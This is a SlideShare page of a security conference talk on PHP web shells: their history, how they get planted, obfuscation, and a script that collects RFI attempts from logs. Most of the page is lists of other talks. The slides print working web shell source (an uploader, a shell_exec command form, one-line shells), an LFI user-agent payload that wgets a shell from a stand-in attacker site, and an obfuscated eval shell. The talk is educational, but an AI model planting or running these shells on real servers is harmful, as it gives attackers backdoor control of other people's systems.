Krzysztof Kotowicz - Hacking HTML5
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
URL Design
URL DesignURL Design
URL Design
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Secure Code Warrior - Local file inclusion
Secure Code Warrior - Local file inclusionSecure Code Warrior - Local file inclusion
Secure Code Warrior - Local file inclusion
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
 
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)Selenium & PHPUnit made easy with Steward (Berlin, April 2017)
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)
 

Mehr von EC-Council

CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldCyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldEC-Council
 
Cloud Security Architecture - a different approach
Cloud Security Architecture - a different approachCloud Security Architecture - a different approach
Cloud Security Architecture - a different approachEC-Council
 
Phases of Incident Response
Phases of Incident ResponsePhases of Incident Response
Phases of Incident ResponseEC-Council
 
Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James EC-Council
 
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinHacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinEC-Council
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeEC-Council
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverEC-Council
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...EC-Council
 
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoData in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoEC-Council
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderEC-Council
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanEC-Council
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019EC-Council
 
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...EC-Council
 
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...EC-Council
 
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerAlexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerEC-Council
 
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementHacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementEC-Council
 
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...EC-Council
 
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...EC-Council
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...EC-Council
 

Mehr von EC-Council (20)

CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldCyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
 
Cloud Security Architecture - a different approach
Cloud Security Architecture - a different approachCloud Security Architecture - a different approach
Cloud Security Architecture - a different approach
 
Phases of Incident Response
Phases of Incident ResponsePhases of Incident Response
Phases of Incident Response
 
Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James
 
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinHacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
 
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoData in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019
 
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
 
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
 
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerAlexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
 
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementHacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
 
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
 
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
 

Kürzlich hochgeladen

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 

Kürzlich hochgeladen (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 

TakeDownCon Rocket City: WebShells by Adrian Crenshaw

  • 1. History, Techniques, Obfuscation and Automated Collection Adrian Crenshaw http://Irongeek.com
  • 2.      I run Irongeek.com I have an interest in InfoSec education I don’t know everything - I’m just a geek with time on my hands Sr. Information Security Engineer at Diebold, doing managed services and pen-test work Co-Founder of Derbycon http://www.derbycon.com http://Irongeek.com Twitter: @Irongeek_ADC
  • 3.   Scripts that act as back doors for maintaining access Common tasks:         File Management Command line access Database server access Bruteforcing Network Scanning Pivots Versions for all sorts of web development environments: PHP, ASP.NET, JSP, etc. Think of it as a RAT (Remote Access Tool/Trojan) for the web http://Irongeek.com
  • 4.   I wanted to be like Jason Scott…and failed Attribution is hard     Old security warning from 1994 http://techpubs.sgi.com/library/dynaweb_docs/0620/SGI_Developer /books/NetscapeSrv_PG/sgi_html/ch01.html Versions of C99 labled “!C99Shell v. 1.0 beta (21.05.2005)!” Search for c99shell before 1/01/2005 turns up plenty of shells, but not historical information Seems to tie to 7/26/1997 (Jul 26, 1997)  filetype:txt PHP daterange:2450654-2450656 http://Irongeek.com
  • 5.  My first experiences were at a school where we could put up homepages that used PHP   shell_exec($command) for the win! Shoveling a Shell using PHP Insecurities (2/12/2004) http://www.irongeek.com/i.php?page=security/phpshell  I’ve been pwned by them before http://Irongeek.com
  • 6.       File upload vulnerabilities Insecure FTP Command Injection Remote File Includes/Local File Includes Exploits on other sites on the same shared host Other Exploits   SQL Injection Vulnerable services http://Irongeek.com
  • 7. 1. Client makes a request to a site with an RFI vulnerability 2. Vulnerable web server grabs malicious file off of another server 3. File is included in code executed on the vulnerable web server 4. Attacker then executes commands on the remote vulnerable web server, uploads different shells, grabs files, etc. http://Irongeek.com
  • 8.    Set browser’s user agent to: <?php system(‘wget http://attackerssite.com/shell.txt -O shell.php’);?> LFI with: http://somesite.com/index.php?page=../../../../pro c/self/environ More at http://www.brianhaddock.com/2011/gaining-shellaccess-via-local-file-inclusion-vulnerabilities http://Irongeek.com
  • 10.    Started as a project to show off web vulnerabilities Like WebGoat, but designed to be easier to use and PHP based I started it, but Jeremy Druin is in charge of it now and has way more code in it than I do http://Irongeek.com
  • 11. <FORM ENCTYPE="multipart/form-data" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];?>" METHOD="POST"> Send this file: <INPUT NAME="userfile" TYPE="file"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <?php if ($_FILES["userfile"]["error"] > 0){ echo "Error: " . $_FILES["userfile"]["error"] . "<br>"; }else{ if ($_FILES["userfile"]["name"] != ""){ echo "Upload: " . $_FILES["userfile"]["name"] . "<br>"; echo "Type: " . $_FILES["userfile"]["type"] . "<br>"; echo "Size: " . ($_FILES["userfile"]["size"] / 1024) . " kB<br>"; echo "Stored in: " . $_FILES["userfile"]["tmp_name"] . "<br>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $_FILES["userfile"]["name"])){ echo "Moved to: " . getcwd() . "/" . $_FILES["userfile"]["name"]; }else{ echo '<font color="$FF0000">Upload failed, may not have permission.</font>'; }}} #Based on examples from: http://www.w3schools.com/php/php_file_upload.asp ?> http://Irongeek.com
  • 12. <HTML><BODY> <FORM METHOD="post" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];?>"> <INPUT TYPE="TEXT" NAME="command"> <INPUT TYPE="Submit"> </FORM> <PRE> <?php $command = str_replace("","",$_POST[command]); echo "<B>Results for $command: </B><P>"; $results = str_replace("<","&lt;",shell_exec($command)); $results = str_replace(">","&gt;",$results); echo $results; ?> </PRE> </BODY></HTML> http://Irongeek.com
  • 13.     Example 1: <?=($_=@$_GET[2]).@$_($_GET[1])?> Example 2: <?echo `$_GET[1]`?> Could not get these to RFI Inspired By Fredrik Almroth http://h.ackack.net/2011/09/tiny-php-shell/ http://Irongeek.com
  • 15.     Repositories http://www.sh3ll.org http://www.r57.gen.tr http://c99.gen.tr http://c99php.com https://github.com/nikicatg/web-malwarecollection/tree/master/Backdoors Laudanum (shell, proxy, DNS recon, reverse shell) http://laudanum.secureideas.net Kali Linux Look in  /usr/share/webshells under platform folders aspx, cfm, jsp, perl and php My Script http://irongeek.com/i.php?page=webshells-and-rfis http://Irongeek.com
  • 16.    Ran periodically by a cron job Reads lines from recent access logs Greps for likely RFIs, then adds them to old unique RFIs and makes sure they are still unique       Request contains “=http://” (and https) Requested file ends in txt|.inc|.dat|.bak Checks to see if they are still active Outputs the attacker IP, whois link, URL to webshell, referer, time, etc. Saves uniques for later If it does not error out, and the file does not exist, it makes an archive copy http://Irongeek.com
  • 17. Why not let the hosting site know they are serving a shell? User Agent String:  Hello, I'm not attacking your site, but someone else tried using this file on your server as an RFI against my site. Contact Irongeek at Irongeek.com for more details http://www.irongeek.com/i.php?page=webshells-and-rfi http://Irongeek.com
  • 18.    Uploaders General Webshells Testers/IDers   Search Engine Spammers   Just show the links to search engines based on user agent strings to get higher ranking via back links Booters    Just emails the attacker that a site in vulnerable, maybe gives a bit of information about the system Botnets based on webshells Webservers generally have more bandwidth than workstations Local rooters  Elevate privileges using local exploits http://Irongeek.com
  • 19.      gzinflate() / gzdeflate() Meant to allow for compressed data base64_decode() / base64_encode() Meant to allow for binary data to me stored as printable ASCII Others: str_rot13() / rawurlencode() / strrev() Truncated example: <? eval(gzinflate(base64_decode('pZL ….OyA=')); ?> Useful decoder: https://defense.ballastsecurity.net/decoding/ http://Irongeek.com
  • 20. echo '<HTML><BODY><FORM METHOD="post" ACTION="'."http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI].'"><INPUT TYPE="TEXT" NAME="command"><INPUT TYPE="Submit"></FORM><PRE>'; $command = str_replace("","",$_POST[command]); echo "<B>Results for $command: </B><P>"; $results = str_replace("<","&lt;",shell_exec($command)); $results = str_replace(">","&gt;",$results); echo $results; echo "</PRE></BODY></HTML>"; Run through http://www.mobilefish.com/services/php_obfuscator/php_obfuscator.php <?php eval(gzinflate(base64_decode(str_rot13('qMSsn4ZjSZKs+lxhS5xIve7KTXue ufY8fkwUFvsFhJjBqVdzfV+/XNdwfQlR5CV7557YyIKqtHxPRG1F4vsURlHCPL 8tLvWVwu723ntDQipvGTVCGEgecsd94lQLLWDM48+Za81NvYDZxxlLkq86 M085l0FM87PjGnDxwAAptQvymRCOKtEPsVw0h+en9iY9sxAx17s2F+zvZ0J vWBJZzh7TJTwjLSEQBpv+hIElv6/64N6alluGUrn8tVKyjxMBtlYkXMswgIRws UDQeSM7VV6iT1QH9fZP3AtG7K3KXOq3Ll2occD/fgdhOco1i5OBjf9WhOVn ahBfs3qA50jw6vwmUck5Xrw+Nt==')))); ?> http://Irongeek.com
  • 21.    GET is in the URL, POST is in the request headers POST method less likely to be logged than GET With a custom client, stealth commands via:    Cookie headers Non-cookie headers Multiple levels of obfuscation making it computationally expensive to decode http://Irongeek.com
  • 22.       Available at: http://code.google.com/p/b374k-shell/ Simple “Polymorphic” version Database functionality Process explorer Reverse and bind shells http://Irongeek.com
  • 23.              Available at: https://github.com/epinna/Weevely Tiny, encrypted, communication over cookies, tons of modules: Enumerate users and /etc/passwd content Check php security configurations Crawl and enumerate web folders files permissions Find wrong system files permissions Guess files with wrong permissions in users home folders Bruteforce all SQL users Bruteforce SQL username Collect system informations Send reverse TCP shell Open a shell on TCP port Execute system shell command http://Irongeek.com             Execute PHP statement Mount remote filesystem using HTTPfs Change file timestamps Remove remote files and folders Get SQL database dump Run SQL console or execute single queries Install and run Proxy to tunnel traffic through target Print interfaces addresses Port scan open TCP ports Install remote PHP proxy Find files with write Find files with superuser flags
